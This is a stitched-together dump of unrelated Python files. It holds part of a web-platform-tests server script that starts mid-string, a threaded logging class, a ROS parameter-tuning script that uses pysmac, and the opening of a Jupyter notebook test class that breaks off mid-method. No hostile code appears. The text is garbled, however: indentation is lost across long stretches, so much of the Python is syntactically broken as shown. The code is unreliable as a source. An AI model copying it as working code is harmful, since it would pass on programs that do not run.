<meta charset=utf-8>
%(meta)s
<script>
self.GLOBAL = {
isWindow: function() { return true; },
isWorker: function() { return false; },
};
</script>
<script src="/resources/testharness.js"></script>
<script src="/resources/testharnessreport.js"></script>
%(script)s
<div id=log></div>
<script src="%(path)s"></script>
"""
class SharedWorkersHandler(HtmlWrapperHandler):
global_type = "sharedworker"
path_replace = [(".any.sharedworker.html", ".any.js", ".any.worker.js")]
wrapper = """<!doctype html>
<meta charset=utf-8>
%(meta)s
<script src="/resources/testharness.js"></script>
<script src="/resources/testharnessreport.js"></script>
<div id=log></div>
<script>
fetch_tests_from_worker(new SharedWorker("%(path)s%(query)s"));
</script>
"""
class ServiceWorkersHandler(HtmlWrapperHandler):
global_type = "serviceworker"
path_replace = [(".any.serviceworker.html", ".any.js", ".any.worker.js")]
wrapper = """<!doctype html>
<meta charset=utf-8>
%(meta)s
<script src="/resources/testharness.js"></script>
<script src="/resources/testharnessreport.js"></script>
<div id=log></div>
<script>
(async function() {
const scope = 'does/not/exist';
let reg = await navigator.serviceWorker.getRegistration(scope);
if (reg) await reg.unregister();
reg = await navigator.serviceWorker.register("%(path)s%(query)s", {scope});
fetch_tests_from_worker(reg.installing);
})();
</script>
"""
class AnyWorkerHandler(WrapperHandler):
headers = [('Content-Type', 'text/javascript')]
path_replace = [(".any.worker.js", ".any.js")]
wrapper = """%(meta)s
self.GLOBAL = {
isWindow: function() { return false; },
isWorker: function() { return true; },
};
importScripts("/resources/testharness.js");
%(script)s
importScripts("%(path)s");
done();
"""
def _meta_replacement(self, key, value):
return None
def _script_replacement(self, key, value):
if key == "script":
attribute = value.replace("\\", "\\\\").replace('"', '\\"')
return 'importScripts("%s")' % attribute
if key == "title":
value = value.replace("\\", "\\\\").replace('"', '\\"')
return 'self.META_TITLE = "%s";' % value
return None
rewrites = [("GET", "/resources/WebIDLParser.js", "/resources/webidl2/lib/webidl2.js")]
class RoutesBuilder(object):
def __init__(self):
self.forbidden_override = [("GET", "/tools/runner/*", handlers.file_handler),
("POST", "/tools/runner/update_manifest.py",
handlers.python_script_handler)]
self.forbidden = [("*", "/_certs/*", handlers.ErrorHandler(404)),
("*", "/tools/*", handlers.ErrorHandler(404)),
("*", "{spec}/tools/*", handlers.ErrorHandler(404)),
("*", "/results/", handlers.ErrorHandler(404))]
self.extra = []
self.mountpoint_routes = OrderedDict()
self.add_mount_point("/", None)
def get_routes(self):
routes = self.forbidden_override + self.forbidden + self.extra
# Using reversed here means that mount points that are added later
# get higher priority. This makes sense since / is typically added
# first.
for item in reversed(self.mountpoint_routes.values()):
routes.extend(item)
return routes
def add_handler(self, method, route, handler):
self.extra.append((str(method), str(route), handler))
def add_static(self, path, format_args, content_type, route, headers=None):
if headers is None:
headers = {}
handler = handlers.StaticHandler(path, format_args, content_type, **headers)
self.add_handler("GET", str(route), handler)
def add_mount_point(self, url_base, path):
url_base = "/%s/" % url_base.strip("/") if url_base != "/" else "/"
self.mountpoint_routes[url_base] = []
routes = [
("GET", "*.worker.html", WorkersHandler),
("GET", "*.window.html", WindowHandler),
("GET", "*.any.html", AnyHtmlHandler),
("GET", "*.any.sharedworker.html", SharedWorkersHandler),
("GET", "*.any.serviceworker.html", ServiceWorkersHandler),
("GET", "*.any.worker.js", AnyWorkerHandler),
("GET", "*.asis", handlers.AsIsHandler),
("GET", "/.well-known/origin-policy", handlers.PythonScriptHandler),
("*", "*.py", handlers.PythonScriptHandler),
("GET", "*", handlers.FileHandler)
]
for (method, suffix, handler_cls) in routes:
self.mountpoint_routes[url_base].append(
(method,
"%s%s" % (url_base if url_base != "/" else "", suffix),
handler_cls(base_path=path, url_base=url_base)))
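    # e.g. add_mount_point("/foo", "/srv/foo") registers, among others,
    # ("GET", "/foo/*.any.html", AnyHtmlHandler(base_path="/srv/foo", url_base="/foo/"))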
def add_file_mount_point(self, file_url, base_path):
assert file_url.startswith("/")
url_base = file_url[0:file_url.rfind("/") + 1]
self.mountpoint_routes[file_url] = [("GET", file_url, handlers.FileHandler(base_path=base_path, url_base=url_base))]
def get_route_builder(aliases, config=None):
builder = RoutesBuilder()
for alias in aliases:
url = alias["url-path"]
directory = alias["local-dir"]
if not url.startswith("/") or len(directory) == 0:
logger.error("\"url-path\" value must start with '/'.")
continue
if url.endswith("/"):
builder.add_mount_point(url, directory)
else:
builder.add_file_mount_point(url, directory)
return builder
class ServerProc(object):
def __init__(self, scheme=None):
self.proc = None
self.daemon = None
self.stop = Event()
self.scheme = scheme
def start(self, init_func, host, port, paths, routes, bind_address, config, **kwargs):
self.proc = Process(target=self.create_daemon,
args=(init_func, host, port, paths, routes, bind_address,
config),
name='%s on port %s' % (self.scheme, port),
kwargs=kwargs)
self.proc.daemon = True
self.proc.start()
def create_daemon(self, init_func, host, port, paths, routes, bind_address,
config, **kwargs):
try:
self.daemon = init_func(host, port, paths, routes, bind_address, config, **kwargs)
except socket.error:
logger.critical("Socket error on port %s" % port, file=sys.stderr)
raise
except Exception:
logger.critical(traceback.format_exc())
raise
if self.daemon:
try:
self.daemon.start(block=False)
try:
self.stop.wait()
except KeyboardInterrupt:
pass
except Exception:
print(traceback.format_exc(), file=sys.stderr)
raise
def wait(self):
self.stop.set()
self.proc.join()
def kill(self):
self.stop.set()
self.proc.terminate()
self.proc.join()
def is_alive(self):
return self.proc.is_alive()
def check_subdomains(config, routes):
paths = config.paths
bind_address = config.bind_address
host = config.server_host
port = get_port()
logger.debug("Going to use port %d to check subdomains" % port)
wrapper = ServerProc()
wrapper.start(start_http_server, host, port, paths, routes,
bind_address, config)
url = "http://{}:{}/".format(host, port)
connected = False
for i in range(10):
try:
urllib.request.urlopen(url)
connected = True
break
except urllib.error.URLError:
time.sleep(1)
if not connected:
logger.critical("Failed to connect to test server "
"on {}. {}".format(url, EDIT_HOSTS_HELP))
sys.exit(1)
for domain in config.domains_set:
if domain == host:
continue
try:
urllib.request.urlopen("http://%s:%d/" % (domain, port))
except Exception:
logger.critical("Failed probing domain {}. {}".format(domain, EDIT_HOSTS_HELP))
sys.exit(1)
wrapper.wait()
def make_hosts_file(config, host):
rv = []
for domain in config.domains_set:
rv.append("%s\t%s\n" % (host, domain))
    # Windows interprets the IP address 0.0.0.0 as non-existent, making it an
    # appropriate alias for non-existent hosts. However, UNIX-like systems
    # interpret the same address to mean any IP address, which is inappropriate
    # for this context. These systems do not reserve any value for this
    # purpose, so the unavailability of the domains must be taken for granted.
#
# https://github.com/web-platform-tests/wpt/issues/10560
if platform.uname()[0] == "Windows":
for not_domain in config.not_domains_set:
rv.append("0.0.0.0\t%s\n" % not_domain)
return "".join(rv)
def start_servers(host, ports, paths, routes, bind_address, config, **kwargs):
servers = defaultdict(list)
    for scheme, scheme_ports in ports.items():
        assert len(scheme_ports) == {"http": 2, "https": 2}.get(scheme, 1)
        # If trying to start HTTP/2.0 server, check compatibility
        if scheme == 'h2' and not http2_compatible():
            logger.error('Cannot start HTTP/2.0 server as the environment is not compatible. ' +
                         'Requires Python 2.7.10+ (< 3.0) and OpenSSL 1.0.2+')
            continue
        for port in scheme_ports:
if port is None:
continue
init_func = {"http": start_http_server,
"https": start_https_server,
"h2": start_http2_server,
"ws": start_ws_server,
"wss": start_wss_server,
"quic-transport": start_quic_transport_server}[scheme]
server_proc = ServerProc(scheme=scheme)
server_proc.start(init_func, host, port, paths, routes, bind_address,
config, **kwargs)
servers[scheme].append((port, server_proc))
return servers
def startup_failed(log=True):
# Log=False is a workaround for https://github.com/web-platform-tests/wpt/issues/22719
if log:
logger.critical(EDIT_HOSTS_HELP)
else:
print("CRITICAL %s" % EDIT_HOSTS_HELP, file=sys.stderr)
sys.exit(1)
def start_http_server(host, port, paths, routes, bind_address, config, **kwargs):
try:
return wptserve.WebTestHttpd(host=host,
port=port,
doc_root=paths["doc_root"],
routes=routes,
rewrites=rewrites,
bind_address=bind_address,
config=config,
use_ssl=False,
key_file=None,
certificate=None,
latency=kwargs.get("latency"))
except Exception:
startup_failed()
def start_https_server(host, port, paths, routes, bind_address, config, **kwargs):
try:
return wptserve.WebTestHttpd(host=host,
port=port,
doc_root=paths["doc_root"],
routes=routes,
rewrites=rewrites,
bind_address=bind_address,
config=config,
use_ssl=True,
key_file=config.ssl_config["key_path"],
certificate=config.ssl_config["cert_path"],
encrypt_after_connect=config.ssl_config["encrypt_after_connect"],
latency=kwargs.get("latency"))
except Exception:
startup_failed()
def start_http2_server(host, port, paths, routes, bind_address, config, **kwargs):
try:
return wptserve.WebTestHttpd(host=host,
port=port,
handler_cls=wptserve.Http2WebTestRequestHandler,
doc_root=paths["doc_root"],
routes=routes,
rewrites=rewrites,
bind_address=bind_address,
config=config,
use_ssl=True,
key_file=config.ssl_config["key_path"],
certificate=config.ssl_config["cert_path"],
encrypt_after_connect=config.ssl_config["encrypt_after_connect"],
latency=kwargs.get("latency"),
http2=True)
except Exception:
startup_failed()
class WebSocketDaemon(object):
def __init__(self, host, port, doc_root, handlers_root, bind_address, ssl_config):
self.host = host
cmd_args = ["-p", port,
"-d", doc_root,
"-w", handlers_root]
if ssl_config is not None:
cmd_args += ["--tls",
"--private-key", ssl_config["key_path"],
"--certificate", ssl_config["cert_path"]]
        if bind_address:
cmd_args = ["-H", host] + cmd_args
opts, args = pywebsocket._parse_args_and_config(cmd_args)
opts.cgi_directories = []
opts.is_executable_method = None
self.server = pywebsocket.WebSocketServer(opts)
ports = [item[0].getsockname()[1] for item in self.server._sockets]
if not ports:
# TODO: Fix the logging configuration in WebSockets processes
# see https://github.com/web-platform-tests/wpt/issues/22719
print("Failed to start websocket server on port %s, "
"is something already using that port?" % port, file=sys.stderr)
raise OSError()
assert all(item == ports[0] for item in ports)
self.port = ports[0]
self.started = False
self.server_thread = None
def start(self, block=False):
self.started = True
if block:
self.server.serve_forever()
else:
self.server_thread = threading.Thread(target=self.server.serve_forever)
            self.server_thread.daemon = True  # don't hang on exit
self.server_thread.start()
def stop(self):
"""
Stops the server.
If the server is not running, this method has no effect.
"""
if self.started:
try:
self.server.shutdown()
self.server.server_close()
self.server_thread.join()
self.server_thread = None
except AttributeError:
pass
self.started = False
self.server = None
def release_mozlog_lock():
try:
from mozlog.structuredlog import StructuredLogger
try:
StructuredLogger._lock.release()
except threading.ThreadError:
pass
except ImportError:
pass
def start_ws_server(host, port, paths, routes, bind_address, config, **kwargs):
# Ensure that when we start this in a new process we have the global lock
# in the logging module unlocked
reload_module(logging)
release_mozlog_lock()
try:
return WebSocketDaemon(host,
str(port),
repo_root,
config.paths["ws_doc_root"],
bind_address,
ssl_config=None)
except Exception:
startup_failed(log=False)
def start_wss_server(host, port, paths, routes, bind_address, config, **kwargs):
# Ensure that when we start this in a new process we have the global lock
# in the logging module unlocked
reload_module(logging)
release_mozlog_lock()
try:
return WebSocketDaemon(host,
str(port),
repo_root,
config.paths["ws_doc_root"],
bind_address,
config.ssl_config)
except Exception:
startup_failed(log=False)
class QuicTransportDaemon(object):
def __init__(self, host, port, handlers_path=None, private_key=None, certificate=None, log_level=None):
args = ["python3", "wpt", "serve-quic-transport"]
if host:
args += ["--host", host]
if port:
args += ["--port", str(port)]
if private_key:
args += ["--private-key", private_key]
if certificate:
args += ["--certificate", certificate]
if handlers_path:
args += ["--handlers-path", handlers_path]
if log_level == "debug":
args += ["--verbose"]
self.command = args
self.proc = None
def start(self, block=False):
if block:
subprocess.call(self.command)
else:
def handle_signal(*_):
if self.proc:
try:
self.proc.terminate()
except OSError:
# It's fine if the child already exits.
pass
self.proc.wait()
sys.exit(0)
signal.signal(signal.SIGTERM, handle_signal)
signal.signal(signal.SIGINT, handle_signal)
self.proc = subprocess.Popen(self.command)
# Give the server a second to start and then check.
time.sleep(1)
if self.proc.poll():
sys.exit(1)
def start_quic_transport_server(host, port, paths, routes, bind_address, config, **kwargs):
# Ensure that when we start this in a new process we have the global lock
# in the logging module unlocked
reload_module(logging)
release_mozlog_lock()
try:
return QuicTransportDaemon(host,
port,
private_key=config.ssl_config["key_path"],
certificate=config.ssl_config["cert_path"],
log_level=config.log_level)
except Exception:
startup_failed(log=False)
def start(config, routes, **kwargs):
host = config["server_host"]
ports = config.ports
paths = config.paths
bind_address = config["bind_address"]
logger.debug("Using ports: %r" % ports)
servers = start_servers(host, ports, paths, routes, bind_address, config, **kwargs)
return servers
def iter_procs(servers):
    for server_list in servers.values():
        for port, server in server_list:
            yield server.proc
def _make_subdomains_product(s, depth=2):
return {u".".join(x) for x in chain(*(product(s, repeat=i) for i in range(1, depth+1)))}
def _make_origin_policy_subdomains(limit):
    return {u"op%d" % x for x in range(1, limit + 1)}
_subdomains = {u"www",
u"www1",
u"www2",
u"天気の良い日",
u"élève"}
_not_subdomains = {u"nonexistent"}
_subdomains = _make_subdomains_product(_subdomains)
# Origin policy subdomains need to not be reused by any other tests, since origin policies have
# origin-wide impacts like installing a CSP or Feature Policy that could interfere with features
# under test.
# See https://github.com/web-platform-tests/rfcs/pull/44.
_subdomains |= _make_origin_policy_subdomains(99)
_not_subdomains = _make_subdomains_product(_not_subdomains)
class ConfigBuilder(config.ConfigBuilder):
"""serve config
This subclasses wptserve.config.ConfigBuilder to add serve config options.
"""
_default = {
"browser_host": "web-platform.test",
"alternate_hosts": {
"alt": "not-web-platform.test"
},
"doc_root": repo_root,
"ws_doc_root": os.path.join(repo_root, "websockets", "handlers"),
"server_host": None,
"ports": {
"http": [8000, "auto"],
"https": [8443, 8444],
"ws": ["auto"],
"wss": ["auto"],
},
"check_subdomains": True,
"log_level": "debug",
"bind_address": True,
"ssl": {
"type": "pregenerated",
"encrypt_after_connect": False,
"openssl": {
"openssl_binary": "openssl",
"base_path": "_certs",
"password": "web-platform-tests",
"force_regenerate": False,
"duration": 30,
"base_conf_path": None
},
"pregenerated": {
"host_key_path": os.path.join(repo_root, "tools", "certs", "web-platform.test.key"),
"host_cert_path": os.path.join(repo_root, "tools", "certs", "web-platform.test.pem")
},
"none": {}
},
"aliases": []
}
computed_properties = ["ws_doc_root"] + config.ConfigBuilder.computed_properties
def __init__(self, *args, **kwargs):
if "subdomains" not in kwargs:
kwargs["subdomains"] = _subdomains
if "not_subdomains" not in kwargs:
kwargs["not_subdomains"] = _not_subdomains
super(ConfigBuilder, self).__init__(
*args,
**kwargs
)
with self as c:
browser_host = c.get("browser_host")
alternate_host = c.get("alternate_hosts", {}).get("alt")
if not domains_are_distinct(browser_host, alternate_host):
raise ValueError(
"Alternate host must be distinct from browser host"
)
def _get_ws_doc_root(self, data):
if data["ws_doc_root"] is not None:
return data["ws_doc_root"]
else:
return os.path.join(data["doc_root"], "websockets", "handlers")
def ws_doc_root(self, v):
self._ws_doc_root = v
ws_doc_root = property(None, ws_doc_root)
def _get_paths(self, data):
rv = super(ConfigBuilder, self)._get_paths(data)
rv["ws_doc_root"] = data["ws_doc_root"]
return rv
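
# Usage sketch (illustrative; mirrors what run() below does via build_config):
#   with ConfigBuilder(ports={"http": [8000]}) as config:
#       routes = get_route_builder(config.aliases, config).get_routes()
#       servers = start(config, routes)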
def build_config(override_path=None, config_cls=ConfigBuilder, **kwargs):
rv = config_cls()
enable_http2 = kwargs.get("h2")
if enable_http2 is None:
enable_http2 = True
if enable_http2:
rv._default["ports"]["h2"] = [9000]
if override_path and os.path.exists(override_path):
with open(override_path) as f:
override_obj = json.load(f)
rv.update(override_obj)
if kwargs.get("config_path"):
other_path = os.path.abspath(os.path.expanduser(kwargs.get("config_path")))
if os.path.exists(other_path):
with open(other_path) as f:
override_obj = json.load(f)
rv.update(override_obj)
else:
raise ValueError("Config path %s does not exist" % other_path)
overriding_path_args = [("doc_root", "Document root"),
("ws_doc_root", "WebSockets document root")]
for key, title in overriding_path_args:
value = kwargs.get(key)
if value is None:
continue
value = os.path.abspath(os.path.expanduser(value))
if not os.path.exists(value):
raise ValueError("%s path %s does not exist" % (title, value))
setattr(rv, key, value)
return rv
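# Hedged usage sketch for build_config (the paths and keyword values here are
# illustrative, not part of the real deployment):
#
#   cfg = build_config(override_path="/tmp/wpt-config.json",  # optional JSON overrides
#                      doc_root="/srv/wpt",                   # must exist on disk
#                      h2=False)                              # skip the HTTP/2.0 port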
def get_parser():
parser = argparse.ArgumentParser()
parser.add_argument("--latency", type=int,
help="Artificial latency to add before sending http responses, in ms")
parser.add_argument("--config", action="store", dest="config_path",
help="Path to external config file")
parser.add_argument("--doc_root", action="store", dest="doc_root",
help="Path to document root. Overrides config.")
parser.add_argument("--ws_doc_root", action="store", dest="ws_doc_root",
help="Path to WebSockets document root. Overrides config.")
parser.add_argument("--alias_file", action="store", dest="alias_file",
help="File with entries for aliases/multiple doc roots. In form of `/ALIAS_NAME/, DOC_ROOT\\n`")
parser.add_argument("--h2", action="store_true", dest="h2", default=None,
help=argparse.SUPPRESS)
parser.add_argument("--no-h2", action="store_false", dest="h2", default=None,
help="Disable the HTTP/2.0 server")
parser.add_argument("--quic-transport", action="store_true", help="Enable QUIC server for WebTransport")
parser.add_argument("--exit-after-start", action="store_true", help="Exit after starting servers")
parser.set_defaults(report=False)
parser.set_defaults(is_wave=False)
return parser
def run(config_cls=ConfigBuilder, route_builder=None, **kwargs):
received_signal = threading.Event()
with build_config(os.path.join(repo_root, "config.json"),
config_cls=config_cls,
**kwargs) as config:
global logger
logger = config.logger
set_logger(logger)
# Configure the root logger to cover third-party libraries.
logging.getLogger().setLevel(config.log_level)
def handle_signal(signum, frame):
logger.debug("Received signal %s. Shutting down.", signum)
received_signal.set()
bind_address = config["bind_address"]
if kwargs.get("alias_file"):
with open(kwargs["alias_file"], 'r') as alias_file:
for line in alias_file:
alias, doc_root = [x.strip() for x in line.split(',')]
config["aliases"].append({
'url-path': alias,
'local-dir': doc_root,
})
if route_builder is None:
route_builder = get_route_builder
routes = route_builder(config.aliases, config).get_routes()
if config["check_subdomains"]:
check_subdomains(config, routes)
stash_address = None
if bind_address:
stash_address = (config.server_host, get_port(""))
logger.debug("Going to use port %d for stash" % stash_address[1])
with stash.StashServer(stash_address, authkey=str(uuid.uuid4())):
servers = start(config, routes, **kwargs)
signal.signal(signal.SIGTERM, handle_signal)
signal.signal(signal.SIGINT, handle_signal)
while (all(subproc.is_alive() for subproc in iter_procs(servers)) and
not received_signal.is_set() and not kwargs["exit_after_start"]):
for subproc in iter_procs(servers):
subproc.join(1)
failed_subproc = 0
for subproc in iter_procs(servers):
if subproc.is_alive():
logger.info('Status of subprocess "%s": running' % subproc.name)
else:
if subproc.exitcode == 0:
logger.info('Status of subprocess "%s": exited correctly' % subproc.name)
else:
logger.warning('Status of subprocess "%s": failed. Exit with non-zero status: %d' % (subproc.name, subproc.exitcode))
failed_subproc += 1
return failed_subproc
def main():
kwargs = vars(get_parser().parse_args())
return run(**kwargs)
|
firstmodule.py
|
import threading
import logging
from time import sleep
class FirstClass:
def __init__(self):
self.counter = 0
self.logger = logging.getLogger("main_logger")
def logging_text(self):
while True:
self.logger.info(f"Logging text from first module. Counter: {self.counter+1}")
self.counter += 1
sleep(5)
    def run(self):
        # Thread.start() returns None, so create the thread first and keep the handle
        first_thread = threading.Thread(target=self.logging_text, daemon=True)
        first_thread.start()
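# Hedged usage sketch (assumes the caller configures "main_logger" or the root
# logger; basicConfig below is one illustrative way to do that):
#
#   logging.basicConfig(level=logging.INFO)
#   FirstClass().run()   # starts the daemon logging thread
#   sleep(12)            # keep the main thread alive long enough to see output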
|
tunerScriptDynamic.py
|
#!/usr/bin/env python
# Software License Agreement (BSD License)
#
# Copyright (c) 2015, Fabian Girrbach, Social Robotics Lab, University of Freiburg
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
# * Neither the name of the copyright holder nor the names of its contributors
# may be used to endorse or promote products derived from this software
# without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
# Dependencies for ROS
import rospy
import rospkg
from std_msgs.msg import Float32, Bool
# Other dependencies
import yaml
from collections import namedtuple
from time import time, sleep
import subprocess
from signal import SIGKILL, SIGTERM
import os
from multiprocessing import Process, Pipe
# PySMAC
import pysmac
# definition of parameters which should be optimized
parameters_to_optimize=dict(\
    markov_trans_prob_0_0=( 'real', [1e-5, 1], 0.8), # Markov transition probabilities
markov_trans_prob_0_1=( 'real',[1e-5, 1], 0.1), # Markov transition probabilities
markov_trans_prob_0_2=( 'real',[1e-5, 1], 0.1), # Markov transition probabilities
markov_trans_prob_1_0=( 'real',[1e-5, 1], 0.3), # Markov transition probabilities
markov_trans_prob_1_1=( 'real',[1e-5, 1], 0.6), # Markov transition probabilities
markov_trans_prob_1_2=( 'real',[1e-5, 1], 0.1), # Markov transition probabilities
markov_trans_prob_2_0=( 'real',[1e-5, 1], 0.4), # Markov transition probabilities
markov_trans_prob_2_1=( 'real',[1e-5, 1], 0.4), # Markov transition probabilities
markov_trans_prob_2_2=( 'real',[1e-5, 1], 0.2), # Markov transition probabilities
IMM0_process_noise_level = ('real',[1e-5, 2.0], 0.01),
IMM1_process_noise_level = ('real',[1e-5, 2.0], 0.1),
IMM2_process_noise_level = ('real',[1e-5, 2.0], 0.1),
ct_turn_rate_variance= ('real',[0, 5], 2.5),
    measurement_noise=("real", [0.01, 2], 0.1),
    process_noise_level=("real", [1e-5, 2.5], 0.1),
    logic_initiator_max_velocity=("real", [0.1, 2.5], 2.0),
    logic_initiator_min_velocity=("real", [0.1, 1], 0.5),
    logic_initiator_systematic_scan_error=("real", [0.001, 0.1], 0.07),
    logic_initiator_number_scans_before_acceptance=("integer", [4, 15], 6),
    logic_initiator_max_number_consecutive_missed_observations=("integer", [0, 7], 3),
    logic_initiator_use_incremental_checking=("integer", [0, 1], 1),
    track_is_mature_after_total_num_matches=("integer", [20, 300], 50),
    max_occlusions_before_deletion_of_mature_track=("integer", [10, 100], 50),
    max_occlusions_before_deletion=("integer", [1, 20], 20),
)
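# Each entry in the dict above follows the pysmac parameter-definition
# convention:
#   name=(type, [lower_bound, upper_bound], default_value)
# where type is 'real' or 'integer'.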
# list of files where the parameters for the optimization should be found
parameter_files_to_search = ['/launch/params/thesis_imm_dynamic.yaml'
,'/launch/params/thesis_ekf_logic_dynamic.yaml'
,'/launch/params/thesis_logic_initiator_dynamic.yaml'
,'/launch/params/thesis_occlusion_manager_basic_logic_dynamic.yaml' ]
# list of ros package names where parameters can be found
packages_for_parameters = ['srl_nearest_neighbor_tracker']
# roslaunch command which should be executed
roslaunch_commands = [ ['roslaunch', 'srl_nearest_neighbor_tracker' , 'dynamic_tuning.launch']]
forbidden_clauses = ['{(max_occlusions_before_deletion_of_mature_track < max_occlusions_before_deletion)}',
'{(logic_initiator_max_velocity < logic_initiator_min_velocity)}',
'{(logic_initiator_number_scans_before_acceptance < logic_initiator_max_number_consecutive_missed_observations)}']
parameter_list = []
fail_result = -1.0
mota_result = -1.0
def find_parameters():
# get an instance of RosPack with the default search paths
rospack = rospkg.RosPack()
    for package_name in packages_for_parameters:
package_path = rospack.get_path(package_name)
for file in parameter_files_to_search:
param_file = package_path + file
try:
                with open(param_file) as yaml_file:
                    params_in_file = yaml.load(yaml_file)
for param_key in parameters_to_optimize:
if param_key in params_in_file:
print 'Found {} in {} paramfile {}'.format(param_key, param_file, parameters_to_optimize[param_key])
new_param = {'name':param_key, 'path':param_file, 'default':parameters_to_optimize[param_key][-1], 'current':50}
parameter_list.append(new_param)
except:
pass
def write_parameters():
print "inside write parameters"
for param in parameter_list:
print "current param {}".format(param)
with open(param['path'], 'r') as param_file:
params_in_file = yaml.load(param_file)
if param['name'] == 'number_of_models':
if param['current'] == 'TWO':
params_in_file[param['name']] = 2
elif param['current'] == 'THREE':
params_in_file[param['name']] = 3
elif param['current'] == 'FOUR':
params_in_file[param['name']] = 4
else:
params_in_file[param['name']] = param['current']
with open(param['path'], 'w') as param_file:
param_file.write(yaml.dump(params_in_file, default_flow_style=True) )
def adaptMarkovProbabilities():
m_00 = next(param for param in parameter_list if param['name']=='markov_trans_prob_0_0')
m_01 = next(param for param in parameter_list if param['name']=='markov_trans_prob_0_1')
m_02 = next(param for param in parameter_list if param['name']=='markov_trans_prob_0_2')
m_10 = next(param for param in parameter_list if param['name']=='markov_trans_prob_1_0')
m_11 = next(param for param in parameter_list if param['name']=='markov_trans_prob_1_1')
m_12 = next(param for param in parameter_list if param['name']=='markov_trans_prob_1_2')
m_20 = next(param for param in parameter_list if param['name']=='markov_trans_prob_2_0')
m_21 = next(param for param in parameter_list if param['name']=='markov_trans_prob_2_1')
m_22 = next(param for param in parameter_list if param['name']=='markov_trans_prob_2_2')
sum0 = m_00['current'] + m_01['current'] + m_02['current']
sum1 = m_10['current'] + m_11['current'] + m_12['current']
sum2 = m_20['current'] + m_21['current'] + m_22['current']
m_00['current'] /= sum0
m_01['current'] /= sum0
m_02['current'] /= sum0
m_10['current'] /= sum1
m_11['current'] /= sum1
m_12['current'] /= sum1
m_20['current'] /= sum2
m_21['current'] /= sum2
m_22['current'] /= sum2
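# Worked example of the row normalisation above: if a sampled row is
# (0.4, 0.4, 0.4), its sum is 1.2, so each entry becomes 0.4/1.2 = 1/3 and
# that row of the Markov transition matrix sums to 1 again.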
def resultCallback(result):
print "PyMot results received {}".format(result)
mota = result.data
global mota_result
mota_result = mota
global process_sim
os.killpg(process_sim.pid, SIGTERM)
sleep(3)
rospy.signal_shutdown('Mota result received')
def clean_ros_logs():
    # ROS accumulates a lot of log files over many iterations, therefore we clean them after each iteration
subprocess.call(['rosclean','purge','-y'])
def start_node(child_conn, ros_command):
clean_ros_logs()
# launch tracker and everything which comes with it
global process_sim, mota_result
mota_result = fail_result
process_sim = subprocess.Popen(ros_command, preexec_fn=os.setsid)
t = Process(target=ExceededTimeThread, args=(330,child_conn,))
t.start()
node = rospy.init_node('tuning_node', anonymous=True)
while rospy.is_shutdown():
print 'Waiting for ROS to start'
sleep(1)
rospy.Subscriber("/pymot_result", Float32, resultCallback)
rospy.spin()
sleep(3)
t.terminate()
tuning_object = dict()
tuning_object['result'] = mota_result
child_conn.send(tuning_object)
def ExceededTimeThread(seconds, child_conn):
passed = 0
while passed < seconds:
sleep(10)
passed += 10
print ("Time passed {}".format(passed))
global process_sim
os.killpg(process_sim.pid, SIGTERM)
sleep(3)
subprocess.call(['rosnode','kill','--all'])
def optimize_parameters(**kwargs):
print "Function was called with arguments: {}".format(kwargs)
    # Modify values in parameter list depending on passed values.
    # Default to the first launch command in case no "instance" argument is passed.
    roslaunch_command = roslaunch_commands[0]
    for arg in kwargs.keys():
print "Current key: {}".format(arg)
if arg == "instance":
roslaunch_command = roslaunch_commands[kwargs[arg]]
print "Current ROS Launch command is {}".format(roslaunch_command)
continue
try:
current = next(param for param in parameter_list if param['name']==arg)
current['current'] = kwargs[arg]
except:
pass
adaptMarkovProbabilities()
write_parameters()
sleep(0.5)
parent_conn, child_conn = Pipe()
p = Process(target=start_node, args=(child_conn,roslaunch_command,))
p.start()
result = parent_conn.recv()
print 'Received current result {}'.format(result['result'])
p.join()
p.terminate()
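    # pysmac minimizes the objective, so negate MOTA to maximize tracking accuracy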
return -result['result']
def init_optimization():
opt = pysmac.SMAC_optimizer(working_directory= '/home/fabian/imm_dynamic_tmp',persistent_files=True, debug = False)
parameter_definition= parameters_to_optimize
print parameter_definition
value, parameters = opt.minimize(optimize_parameters # the function to be minimized
, 350 # the maximum number of function evaluations
, parameter_definition
, t_limit_function_s=360
, forbidden_clauses=forbidden_clauses
, num_runs=2
, deterministic=True
, num_train_instances=len(roslaunch_commands)) # for the mainstation file one evaluation needs 6min
print('The minimum value %f was found for the configurations %s' % (value, parameters))
if __name__ == '__main__':
try:
find_parameters()
init_optimization()
except rospy.ROSInterruptException:
pass
|
launchnotebook.py
|
"""Base class for notebook tests."""
from __future__ import print_function
import os
import sys
import time
import requests
from contextlib import contextmanager
from threading import Thread, Event
from unittest import TestCase
pjoin = os.path.join
try:
from unittest.mock import patch
except ImportError:
from mock import patch #py2
from tornado.ioloop import IOLoop
import jupyter_core.paths
from ..notebookapp import NotebookApp
from ipython_genutils.tempdir import TemporaryDirectory
MAX_WAITTIME = 30 # seconds to wait for notebook server to start
POLL_INTERVAL = 0.1 # time between attempts
# TimeoutError is a builtin on Python 3. This can be removed when we stop
# supporting Python 2.
class TimeoutError(Exception):
pass
class NotebookTestBase(TestCase):
"""A base class for tests that need a running notebook.
    This creates some empty config and runtime directories
and then starts the notebook server with them.
"""
port = 12341
config = None
# run with a base URL that would be escaped,
# to test that we don't double-escape URLs
url_prefix = '/a%40b/'
@classmethod
def wait_until_alive(cls):
"""Wait for the server to be alive"""
url = cls.base_url() + 'api/contents'
